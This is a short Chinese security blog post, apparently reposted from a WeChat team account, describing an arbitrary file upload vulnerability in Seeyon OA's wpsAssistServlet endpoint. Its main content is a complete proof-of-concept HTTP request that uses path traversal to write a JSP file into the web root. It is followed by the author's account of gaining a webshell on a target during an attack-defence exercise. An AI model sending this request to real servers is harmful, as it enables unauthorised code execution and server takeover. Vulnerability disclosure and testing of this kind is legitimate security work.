0x00 概述
致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
影响版本:
0x01 正文
在实战攻防演练,信息搜集到某靶标有致远OA,且版本号恰好是A8,死马当活马医,碰运气复现一下。
PoC:(realFileType, fileId 参数可控,可以通过 ../ 遍历上传到任意目录下)
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2 HTTP/1.1Host:Content-Length: 349Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616bAccept-Encoding: gzip--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="upload"; filename="123.xls"Content-Type: application/vnd.ms-excel<% out.println("seeyon_vuln");%>--59229605f98b8cf290a7b8908b34616b--
访问:http://IP/debuggg.jsp
查看webshell工具,测试连接,成功getshell,水了100分美滋滋。
whoami查看当前用户
- End -
原文始发于微信公众号(NS Demon团队):致远OA wpsAssistServlet 任意文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论